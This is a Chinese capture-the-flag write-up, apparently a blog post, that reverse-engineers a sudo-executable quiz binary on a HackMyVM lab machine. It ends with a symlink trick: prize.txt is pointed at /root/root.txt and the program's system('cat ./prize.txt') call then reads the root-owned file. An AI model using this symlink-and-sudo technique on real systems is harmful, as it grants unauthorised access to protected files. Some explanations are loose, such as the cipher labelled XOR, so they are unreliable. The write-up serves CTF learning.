│           0x004016b7      488d05320a..   lea rax, str.Hey_guys__I_have_prepared_this_little_program_to_find_out_how_much_you_know_about_me__since_I_have_been_your_administrator_for_2_years. ; 0x4020f0 ; "Hey guys, I have prepared this little program to find out how much you know about me, since I have been your administrator for 2 years."                                                                                                                                                                  
│           0x004016be      488945f8       mov qword [s], rax
│           0x004016c2      488d05af0a..   lea rax, str.If_you_get_all_the_questions_right__you_win_a_teddy_bear_and_if_you_dont__you_win_a_teddy_bear_and_if_you_dont__you_win_trash ; 0x402178 ; "If you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash"            
│           0x004016c9      488945f0       mov qword [var_10h], rax
│           0x004016cd      488b45f8       mov rax, qword [s]
│           0x004016d1      4889c7         mov rdi, rax                ; const char *s
│           0x004016d4      e8e7f9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x004016d9      488b45f0       mov rax, qword [var_10h]
│           0x004016dd      4889c7         mov rdi, rax                ; const char *s
│           0x004016e0      e8dbf9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x004016e5      c745ec0000..   mov dword [var_14h], 0
│           0x004016ec      b800000000     mov eax, 0
│           0x004016f1      e80ffdffff     call sym.question_1
│           0x004016f6      0145ec         add dword [var_14h], eax
│           0x004016f9      b800000000     mov eax, 0
│           0x004016fe      e87bfdffff     call sym.question_2
│           0x00401703      0145ec         add dword [var_14h], eax
│           0x00401706      b800000000     mov eax, 0
│           0x0040170b      e834feffff     call sym.question_3
│           0x00401710      0145ec         add dword [var_14h], eax
│           0x00401713      8b55ec         mov edx, dword [var_14h]
│           0x00401716      488d45e0       lea rax, [var_20h]
│           0x0040171a      89d6           mov esi, edx                ; int64_t arg2
│           0x0040171c      4889c7         mov rdi, rax                ; char *arg1
│           0x0040171f      e8befeffff     call sym.writeResults
│           0x00401724      837dec03       cmp dword [var_14h], 3
│       ┌─< 0x00401728      750a           jne 0x401734
│       │   0x0040172a      8b45ec         mov eax, dword [var_14h]
│       │   0x0040172d      89c7           mov edi, eax                ; int64_t arg1
│       │   0x0040172f      e802fbffff     call sym.print_prize
│       │   ; CODE XREF from main @ 0x401728(x)
│       └─> 0x00401734      8b0542290000   mov eax, dword [obj.foo]    ; [0x40407c:4]=0
│           0x0040173a      83f855         cmp eax, 0x55               ; 'U' ; 85
│       ┌─< 0x0040173d      750a           jne 0x401749
│       │   0x0040173f      b800000000     mov eax, 0
│       │   0x00401744      e88cfeffff     call sym.wait_what
│       │   ; CODE XREF from main @ 0x40173d(x)
│       └─> 0x00401749      b800000000     mov eax, 0
│           0x0040174e      c9             leave
└           0x0040174f      c3             ret


[0x0040168f]> pdc @main
int main (int rdi, int rsi) {
    loc_0x40168f:
        // DATA XREF from entry0 @ 0x401168(r)
        endbr
        push  (rbp)
        rbp = rsp
        rsp -= 0x30
        dword [var_24h] = edi // argc
        qword [var_30h] = rsi // argv
        rax = 0x2e73746c75736572 // 'results.'
        qword [var_20h] = rax
        dword [var_18h] = 0x747874 // 'txt'
        rax = rip + str.Hey_guys__I_have_prepared_this_little_program_to_find_out_how_much_you_know_about_me__since_I_have_been_your_administrator_for_2_years. // 0x4020f0 // "Hey guys, I have prepared this little program to find out how much you know about me, since I have been your administrator for 2 years."                        
        qword [s] = rax
        rax = rip + str.If_you_get_all_the_questions_right__you_win_a_teddy_bear_and_if_you_dont__you_win_a_teddy_bear_and_if_you_dont__you_win_trash // 0x402178 // "If you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash"
        qword [var_10h] = rax
        rax = qword [s] // "Hey guys, I have prepared this little program to find out how m" str.Hey_guys__I_have_prepared_this_little_program_to_find_out_how_much_you_know_about_me__since_I_have_been_your_administrator_for_2_years.                                                                                                        
        rdi = rax     // const char *s // "Hey guys, I have prepared this little program to find out how m" str.Hey_guys__I_have_prepared_this_little_program_to_find_out_how_much_you_know_about_me__since_I_have_been_your_administrator_for_2_years.                                                                                         
        sym.imp.puts  ()
        // int puts("Hey guys, I have prepared this little program to find out how much you know about me, since I have been your administrator for 2 years.")
        rax = qword [var_10h] // "If you get all the questions right, you win a teddy bear and if" str.If_you_get_all_the_questions_right__you_win_a_teddy_bear_and_if_you_dont__you_win_a_teddy_bear_and_if_you_dont__you_win_trash                                                                                                            
        rdi = rax     // const char *s // "If you get all the questions right, you win a teddy bear and if" str.If_you_get_all_the_questions_right__you_win_a_teddy_bear_and_if_you_dont__you_win_a_teddy_bear_and_if_you_dont__you_win_trash                                                                                                   
        sym.imp.puts  ()
        // int puts("If you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash")
        dword [var_14h] = 0
        eax = 0
        sym.question_1  ()
        dword [var_14h] += eax
        eax = 0
        sym.question_2  ()
        dword [var_14h] += eax
        eax = 0
        sym.question_3  ()
        dword [var_14h] += eax
        edx = dword [var_14h]
        rax = var_20h // "results.txt"
        esi = edx     // int64_t arg2
        rdi = rax     // char *arg1 // "results.txt"
        sym.writeResults  () // sym.writeResults(0x177fd8, 0x0)
        var = dword [var_14h] - 3
        if  (var) goto loc_0x401734 // likely
        goto loc_0x40172a
    loc_0x401734:
        // CODE XREF from main @ 0x401728(x)
        eax = dword [obj.foo] // [0x40407c:4]=0
        var = eax - 0x55 // 'U' // 85
        if  (var) goto loc_0x401749 // likely
        goto loc_0x40173f
    loc_0x401749:
        // CODE XREF from main @ 0x40173d(x)
        eax = 0
        =             // rsp
        r
        goto loc_0x401749
         // } else {
        goto loc_0x401734
        }
        return rax;
}


1、将 result和txt都存放在rax寄存器内!

2、0x004016b7 和 0x004016c2地址通过调用lea 指令来加载字符串的地址到寄存器rax中,然后通过mov指令将寄存器中的地址值存储到相应的内存位置。
这里他把这两个字符换的变量存到了s变量指定的内存里面!

3、程序在运行的过程中会提问三个问题! 也就是 question_1、question_2、question_3

4、如果所有的问题都答对了,就直接查看当前目录下的prize.txt文件!
question_1
[0x0040147e]> s sym.question_1
[0x00401405]> pdc@sym.question_1
int sym.question_1 (int rdi, int rsi) {
    loc_0x401405:
        // CALL XREF from main @ 0x4016f1(x)
        endbr
        push  (rbp)
        rbp = rsp
        rsp -= 0x70
        rax = rip + str.What_is_my_favorite_OS_ // 0x40201e // "What is my favorite OS?"
        rdi = rax     // const char *s // "What is my favorite OS?" str.What_is_my_favorite_OS_
        sym.imp.puts  ()
        // int puts("What is my favorite OS?")
        rdx = qword [obj.stdin] // obj.__TMC_END__
        // [0x404070:8]=0 // FILE *stream
        rax = s1
        esi = 0xc8    // 200 // int size
        rdi = rax     // char *s
        sym.imp.fgets  ()
        // char *fgets("", -1, ?)
        rax = s1
        rdx = rip + str.linux_n // 0x402036 // "linux\n"
        rsi = rdx     // const char *s2 // "linux\n" str.linux_n
        rdi = rax     // const char *s1
        sym.imp.strcmp  ()
        // int strcmp("", "linux\n")
        var = eax & eax
        if  (var) goto loc_0x401468 // likely
        goto loc_0x401452
    loc_0x401468:
        // CODE XREF from sym.question_1 @ 0x401450(x)
        rax = rip + str.Nope__ // 0x402047 // "Nope!!"
        rdi = rax     // const char *s // "Nope!!" str.Nope__
        sym.imp.puts  ()
        // int puts("Nope!!")
        eax = 0
        goto loc_0x40147c
        do {
    loc_0x40147c:
        // CODE XREF from sym.question_1 @ 0x401466(x)
        =             // rsp
        r
         // } while (?);
         // } while (?);
        goto loc_0x40147c
        }
        return rax;
}
[0x00401405]> 


问题一: What is my favorite OS?
通过分析伪代码,答案就是 Linux!

question_2
[0x00401405]> pdc@sym.question_2
int sym.question_2 (int rdi, int rsi) {
    loc_0x40147e:
        // CALL XREF from main @ 0x4016fe(x)
        endbr
        push  (rbp)
        rbp = rsp
        rsp += 0xffffffffffffff80
        rax = rip + str.What_is_my_favorite_food_ // 0x40204e // "What is my favorite food?"
        rdi = rax     // const char *s // "What is my favorite food?" str.What_is_my_favorite_food_
        sym.imp.puts  ()
        // int puts("What is my favorite food?")
        rdx = qword [obj.stdin] // obj.__TMC_END__
        // [0x404070:8]=0 // FILE *stream
        rax = s1
        esi = 0x64    // 'd' // 100 // int size
        rdi = rax     // char *s
        sym.imp.fgets  ()
        // char *fgets("", -1, ?)
        dword [var_4h] = 5
        rax = s1
        rdi = rax     // const char *s
        sym.imp.strlen  ()
        // size_t strlen("")
        qword [var_10h] = rax
        var = qword [var_10h] - 0
        if  (!var) goto loc_0x4014ed // unlikely
        goto loc_0x4014cf
    loc_0x4014ed:
        // CODE XREFS from sym.question_2 @ 0x4014cd(x), 0x4014de(x)
        edx = dword [var_4h]
        rax = s1
        esi = edx     // int64_t arg2
        rdi = rax     // int64_t arg1
        sym.secret_q2  () // sym.secret_q2(0x177f80, 0x0)
        rax = s1
        rdx = rip + str.gfhts_ufshfpjx // 0x402068 // "gfhts ufshfpjx"
        rsi = rdx     // const char *s2 // "gfhts ufshfpjx" str.gfhts_ufshfpjx
        rdi = rax     // const char *s1
        sym.imp.strcmp  ()
        // int strcmp("N\x14@", "gfhts ufshfpjx")
        var = eax & eax
        if  (var) goto loc_0x40152e // likely
        goto loc_0x401518
    loc_0x40152e:
        // CODE XREF from sym.question_2 @ 0x401516(x)
        rax = rip + str.Nope__ // 0x402047 // "Nope!!"
        rdi = rax     // const char *s // "Nope!!" str.Nope__
        sym.imp.puts  ()
        // int puts("Nope!!")
        eax = 0
        goto loc_0x401542
        do {
    loc_0x401542:
        // CODE XREF from sym.question_2 @ 0x40152c(x)
        =             // rsp
        r
         // } while (?);
         // } while (?);
        goto loc_0x401542
         // } while (?);
        goto loc_0x4014e0
        }
        return rax;
    loc_0x4014e0:
        rax = qword [var_10h]
        rax -= 1
        byte [rbp + rax - 0x80] = 0
        goto loc_0x4014ed
}

[0x00401405]> pdc@sym.secret_q2
int sym.secret_q2 (int rdi, int rsi) {
    loc_0x401274:
        // CALL XREF from sym.question_2 @ 0x4014f9(x)
        endbr
        push  (rbp)
        rbp = rsp
        qword [var_18h] = rdi // arg1
        dword [var_1ch] = esi // arg2
        dword [var_4h] = 0
        goto loc_0x401385
        goto loc_0x401385
        do {
    loc_0x401385:
        // CODE XREF from sym.secret_q2 @ 0x40128a(x)
        eax = dword [var_4h]
        rdx = eax
        rax = qword [var_18h]
        rax += rdx
        eax = byte [rax]
        var = al & al
        if  (var) goto loc_0x40128f // likely
        goto loc_0x40139d
         // } while (?);
        goto loc_0x40139d
        }
        return rax;
    loc_0x40139d:
        n
        n
        rbp = pop  ()
        r
        }
        return rax;
    loc_0x004012a3:  // orphan
             eax = dword [var_4h]
             rdx = eax
             rax = qword [var_18h]
             rax += rdx
             eax = byte [rax]
             var = al - 0x7a          // 'z' // 122
             if  (var > 0) goto loc_loc_0x401309 // unlikely
    loc_0x004012b7:  // orphan
         eax = dword [var_4h]
         rdx = eax
         rax = qword [var_18h]
         rax += rdx
         eax = byte [rax]
         eax = al
         edx = rax - 0x61
         eax = dword [var_1ch]
         eax += edx
         rdx = eax
         rdx = rdx * 0x4ec4ec4f
         rdx >>>= 0x20
         edx >>= 3
         ecx = eax
         ecx >>= 0x1f
         edx -= ecx
         ecx = edx * 0x1a
         eax -= ecx
         edx = eax
         eax = edx
         ecx = rax + 0x61
         eax = dword [var_4h]
         rdx = eax
         rax = qword [var_18h]
         rax += rdx
         edx = ecx
         byte [rax] = dl
         goto loc_loc_0x401381
    loc_0x00401309:  // orphan
         // CODE XREFS from sym.secret_q2 @ 0x4012a1(x), 0x4012b5(x)
         eax = dword [var_4h]
         rdx = eax
         rax = qword [var_18h]
         rax += rdx
         eax = byte [rax]
         var = al - 0x40          // elf_phdr
         if  (var <= 0) goto loc_loc_0x401381 // unlikely
    loc_0x0040131d:  // orphan
         eax = dword [var_4h]
         rdx = eax
         rax = qword [var_18h]
         rax += rdx
         eax = byte [rax]
         var = al - 0x5a          // 'Z' // 90
         if  (var > 0) goto loc_loc_0x401381 // likely
    loc_0x00401331:  // orphan
         eax = dword [var_4h]
         rdx = eax
         rax = qword [var_18h]
         rax += rdx
         eax = byte [rax]
         eax = al
         edx = rax - 0x41
         eax = dword [var_1ch]
         eax += edx
         rdx = eax
         rdx = rdx * 0x4ec4ec4f
         rdx >>>= 0x20
         edx >>= 3
         ecx = eax
         ecx >>= 0x1f
         edx -= ecx
         ecx = edx * 0x1a
         eax -= ecx
         edx = eax
         eax = edx
         ecx = rax + 0x41
         eax = dword [var_4h]
         rdx = eax
         rax = qword [var_18h]
         rax += rdx
         edx = ecx
         byte [rax] = dl
    loc_0x00401381:  // orphan
         // CODE XREFS from sym.secret_q2 @ 0x401307(x), 0x40131b(x), 0x40132f(x)
         dword [var_4h] += 1
}

# 这个函数主要就是处理问题2的 那个字符串的!

问题二呢,给了一个字符串 gfhts ufshfpjx

打了这么多年ctf,直觉告诉我,这是某种加密!


bacon pancakes  (培根煎饼)

虽然我英语不行,但是我还是能看出来他是一个正常的短语的!


第二个问题也回答正确!
question_3
[0x00401405]> pdc@sym.question_3
int sym.question_3 (int rdi, int rsi) {
    loc_0x401544:
        // CALL XREF from main @ 0x40170b(x)
        endbr
        push  (rbp)
        rbp = rsp
        rsp -= 0x70
        rax = rip + str.What_is_my_favorite_text_editor_ // 0x402078 // "What is my favorite text editor?"
        rdi = rax     // const char *s // "What is my favorite text editor?" str.What_is_my_favorite_text_editor_
        sym.imp.puts  ()
        // int puts("What is my favorite text editor?")
        rdx = qword [obj.stdin] // obj.__TMC_END__
        // [0x404070:8]=0 // FILE *stream
        rax = s1
        esi = 0x64    // 'd' // 100 // int size
        rdi = rax     // char *s
        sym.imp.fgets  ()
        // char *fgets("", -1, ?)
        dword [var_4h] = 6
        edx = dword [var_4h]
        rax = s1
        esi = edx     // int64_t arg2
        rdi = rax     // int64_t arg1
        sym.secret_q3  () // sym.secret_q3(0x177f88, 0x6)
        rax = s1
        rdx = rip + str.hpokqornvjsaohu_n // 0x402099 // "hpok&qorn&vjsaohu\n"
        rsi = rdx     // const char *s2 // "hpok&qorn&vjsaohu\n" str.hpokqornvjsaohu_n
        rdi = rax     // const char *s1
        sym.imp.strcmp  ()
        // int strcmp("", "hpok&qorn&vjsaohu\n")
        var = eax & eax
        if  (var) goto loc_0x4015bf // likely
        goto loc_0x4015a9
    loc_0x4015bf:
        // CODE XREF from sym.question_3 @ 0x4015a7(x)
        rax = rip + str.Nope__ // 0x402047 // "Nope!!"
        rdi = rax     // const char *s // "Nope!!" str.Nope__
        sym.imp.puts  ()
        // int puts("Nope!!")
        eax = 0
        goto loc_0x4015d3
        do {
    loc_0x4015d3:
        // CODE XREF from sym.question_3 @ 0x4015bd(x)
        =             // rsp
        r
         // } while (?);
         // } while (?);
        goto loc_0x4015d3
        }
        return rax;
}

[0x00401405]> pdc@sym.secret_q3
int sym.secret_q3 (int rdi, int rsi) {
    loc_0x4013a1:
        // CALL XREF from sym.question_3 @ 0x40158a(x)
        endbr
        push  (rbp)
        rbp = rsp
        rsp -= 0x20
        qword [s] = rdi // arg1
        dword [var_1ch] = esi // arg2
        rax = qword [s]
        rdi = rax     // const char *s
        sym.imp.strlen  ()
        // size_t strlen(-1)
        dword [var_8h] = eax
        dword [var_4h] = 0
        goto loc_0x4013f6
        goto loc_0x4013f6
        do {
    loc_0x4013f6:
        // CODE XREF from sym.secret_q3 @ 0x4013ca(x)
        eax = dword [var_8h] // rsp
        eax -= 1
        var = dword [var_4h] - eax
        jl 0x4013cc   // likely
        goto loc_0x401401
         // } while (?);
        goto loc_0x401401
        }
        return rax;
    loc_0x401401:
        n
        n
        =             // rsp
        r
        }
        return rax;
}

字符串 : hpok&qorn&vjsaohu

通过查看 问题三中 hpok&qorn&vjsaohu 字符串的处理方法

函数接受两个参数 rdi 和 rsi,其中 rdi 被存储在 [s] 中,rsi 被存储在 [var_1ch] 中。

函数通过调用 strlen 函数来获取参数 s 所指向字符串的长度,并将结果保存在 [var_8h] 中。

接下来是一个循环,循环条件是 [var_4h] 小于字符串长度减一,这里使用了 jl(jump if less)指令,表示循环条件成立时跳转到指定位置。


所以说,这个就是个简单的异或加密!


答案就是:nvim with plugins

prize.txt
[0x00401405]> pdc@sym.print_prize
int sym.print_prize (int rdi, int rsi) {
    loc_0x401236:
        // CALL XREF from main @ 0x40172f(x)
        endbr
        push  (rbp)
        rbp = rsp
        rsp -= 0x20
        dword [var_14h] = edi // arg1
        rax = rip + str.cat_._prize.txt // 0x402008 // "cat ./prize.txt"
        rdi = rax     // const char *string // "cat ./prize.txt" str.cat_._prize.txt
        sym.imp.system  ()
        // int system("cat ./prize.txt")
        dword [var_4h] = eax
        var = dword [var_4h] - 0xffffffff
        if  (var) goto loc_0x401271 // likely
        goto loc_0x40125d
    loc_0x401271:
        // CODE XREF from sym.print_prize @ 0x40125b(x)
        n
        =             // rsp
        r
        goto loc_0x401271
        }
        return rax;
}


当我们三个问题都答对的时候,就会执行这个方法!

也就是查看 当前路径下的 prize.txt文件!
软连接
bacon pancakes

nvim with plugins


我想了一下,既然最后调用的是当前路径下的prize.txt文件,我们就可以在html目录下创建这两个文件 results.txt和prize.txt文件!
然后创建一个软连接指向root/root.txt文件!
最后运行这个可执行程序即可拿到root.txt文件内容!

为什么在html,因为当前用户是www-data啊!


www-data@minimal:/var/www/html$ touch prize.txt
touch prize.txt
www-data@minimal:/var/www/html$ touch results.txt             
touch results.txt
www-data@minimal:/var/www/html$ rm prize.txt;ln -sv /root/root.txt prize.txt
rm prize.txt;ln -sv /root/root.txt prize.txt
'prize.txt' -> '/root/root.txt'
www-data@minimal:/var/www/html$ 


www-data@minimal:/var/www/html$ sudo /opt/quiz/shop
sudo /opt/quiz/shop
Hey guys, I have prepared this little program to find out how much you know about me, since I have been your administrator for 2 years.
If you get all the questions right, you win a teddy bear and if you don't, you win a teddy bear and if you don't, you win trash
What is my favorite OS?
Linux
Nope!!
What is my favorite food?
bacon pancakes
Correct!!
What is my favorite text editor?
nvim with plugins
Correct!!
User name: 111
Saving results .
HMV{never_gonna_ROP_you_down}
真的学不了一点。。。
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值